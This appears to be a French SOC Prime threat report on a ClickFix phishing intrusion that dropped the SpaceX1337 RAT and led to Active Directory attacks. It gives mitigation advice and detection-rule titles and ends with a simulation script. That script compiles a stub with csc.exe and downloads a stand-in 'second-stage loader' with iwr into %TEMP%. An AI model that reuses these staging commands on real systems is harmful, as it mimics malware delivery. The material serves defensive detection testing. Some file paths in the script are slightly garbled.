SOC Prime Bias: Critical

17 Aug 2026 07:03 UTC

SpaceX1337 ClickFix entraîne un compromis AD manuel

Author Photo
SOC Prime Team linkedin icon Suivre
SpaceX1337 ClickFix entraîne un compromis AD manuel
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Un adversaire a utilisé un leurre de phishing ClickFix pour déployer le RAT SpaceX1337, suivi d’une infection en plusieurs étapes impliquant des RAT de commodité tels que NetSupport, AsyncRAT et Remus. L’intrusion est passée d’un vol d’identifiants automatisé à une activité interactive sur clavier ciblant Active Directory. L’attaquant a finalement tenté un mouvement latéral vers un contrôleur de domaine et un bourrage d’identifiants contre un portail VPN.

Enquête

L’intrusion a été capturée dans un honeynet Active Directory entièrement instrumenté, offrant une visibilité de bout en bout grâce à la télémétrie EDR, Zeek et Suricata. Les chercheurs ont tracé l’activité du premier téléchargeur PowerShell à travers une reconnaissance étendue ADSI/LDAP et un mouvement latéral sur SMB. L’enquête a clairement identifié la transition de l’exécution automatisée de logiciels malveillants à l’interaction directe par un opérateur humain.

Atténuation

Les organisations doivent appliquer des contrôles stricts sur l’exécution de PowerShell et surveiller les relations suspectes parent-enfant des processus, y compris explorer.exe engendrant PowerShell. Les équipes de sécurité doivent détecter la compilation sur hôte via csc.exe et l’utilisation abusive des LOLBins tels que certutil or bitsadmin pour les téléchargements externes. Active Directory doit également être renforcé en supprimant les données sensibles des attributs LDAP et en surveillant les requêtes LDAP anormales.

Réponse

Si une activité suspecte est détectée, les répondants aux incidents doivent isoler les points de terminaison concernés et révoquer les identifiants de compte de service et d’administrateur de domaine potentiellement compromis. Les enquêtes doivent prioriser l’identification de plusieurs familles de RAT et vérifier les tâches planifiées non autorisées ou les modifications du registre. Les journaux VPN doivent également être examinés pour les tentatives de bourrage d’identifiants provenant d’une infrastructure malveillante connue.

Flux du005cu0027attaque

Détections

Exécution Python depuis des dossiers suspects (via cmdline)

Équipe SOC Prime
13 août 2026

Entrée RunMRU suspecte avec sémantique LOLBin (via registry_event)

Équipe SOC Prime
13 août 2026

Exécution de commande sur un hôte distant à l’aide de la gestion à distance Windows (via cmdline)

Équipe SOC Prime
13 août 2026

Possibilité d’énumération ou de manipulation de comptes ou de groupes (via cmdline)

Équipe SOC Prime
13 août 2026

Découverte suspecte de confiance des domaines (via cmdline)

Équipe SOC Prime
13 août 2026

Possibilité de découverte de la configuration réseau du système (via cmdline)

Équipe SOC Prime
13 août 2026

Exécutable suspect ne contenant que des chiffres dans le nom (via cmdline)

Équipe SOC Prime
13 août 2026

LOLBAS Schtasks (via cmdline)

Équipe SOC Prime
13 août 2026

Utilisation de Certutil pour le codage de données et les opérations de certificat (via cmdline)

Équipe SOC Prime
13 août 2026

LOLBAS Bitsadmin (via cmdline)

Équipe SOC Prime
13 août 2026

Possibilité de vidage SAM/SYSTEM/SECURITY (via cmdline)

Équipe SOC Prime
13 août 2026

Appel de méthodes .NET suspectes depuis Powershell (via powershell)

Équipe SOC Prime
13 août 2026

Communication de domaine Trycloudflare suspecte (via dns)

Équipe SOC Prime
13 août 2026

Tentative de communication de recherche d’IP possible (via dns)

Équipe SOC Prime
13 août 2026

IOCs (HashSha256) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct

Règles IA SOC Prime
13 août 2026

IOCs (HashMd5) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct

Règles IA SOC Prime
13 août 2026

IOCs (SourceIP) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct

Règles IA SOC Prime
13 août 2026

IOCs (DestinationIP) à détecter : De ClickFix SpaceX1337 à Attaque AD en direct

Règles IA SOC Prime
13 août 2026

Règle Sigma haute fidélité pour communication SpaceX1337 et AdaptixC2 [Connexion réseau Windows]

Règles IA SOC Prime
13 août 2026

Détection de compilation de beacon AdaptixC2 et de chargeur PowerShell [Création de processus Windows]

Règles IA SOC Prime
13 août 2026

Exécution de simulation

Prérequis : La vérification préalable de la télémétrie et de la base de référence doit être réussie.

Raisonnement : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) destinée à déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à des erreurs de diagnostic.

  • Récit d’attaque et commandes : Un adversaire a obtenu un accès initial via un lien de phishing. Pour éviter de déposer un .exe malveillant connu sur le disque, ils déposent un petit .cs fichier source. Ils invoquent ensuite csc.exe pour compiler cette source en un exécutable Windows fonctionnel (svc.exe) situé dans le répertoire %TEMP% . Immédiatement après la compilation, l’attaquant utilise PowerShell pour récupérer un chargeur de deuxième étape depuis un serveur C2 distant (simulé via un auditeur local) en utilisant l’alias iwr (Invoke-WebRequest), l’enregistrant dans le dossier temporaire pour compléter le processus de mise en scène.

  • Script de test de régression :

    # 1. Créer un fichier source C# fictif pour simuler la source AdaptixC2
    $csFile = "$env:TEMPsvc.cs"
    $exeFile = "$env:TEMPsvc.exe"
    $sourceCode = @"
    using System;
    namespace MimicC2 {
        class Program {
            static void Main() { Console.WriteLine("Simulated Beacon"); }
        }
    }
    "@
    $sourceCode | Out-File -FilePath $csFile -Encoding ascii
    
    # 2. Simuler la compilation csc.exe (Déclenche selection_csc)
    # Note : Nous utilisons les mêmes drapeaux que ceux spécifiés dans la logique de détection
    Start-Process "csc.exe" -ArgumentList "/target:winexe", "/out:$env:TEMPsvc.exe", "$env:TEMPsvc.cs" -Wait
    
    # 3. Simuler le téléchargement PowerShell (Déclenche selection_powershell)
    # Nous utilisons 'iwr' et le chemin OutFile spécifique pour correspondre à la logique
    # En utilisant une URL inexistante pour éviter le trafic réseau réel, mais la ligne de commande correspondra
    powershell.exe -Command "iwr -Uri 'http://127.0.0.1' -OutFile `"$env:TEMPx.ps1`""
  • Commandes de nettoyage :

    Remove-Item -Path "$env:TEMPsvc.cs" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPsvc.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item -Path "$env:TEMPx.ps1" -Force -ErrorAction SilentlyContinue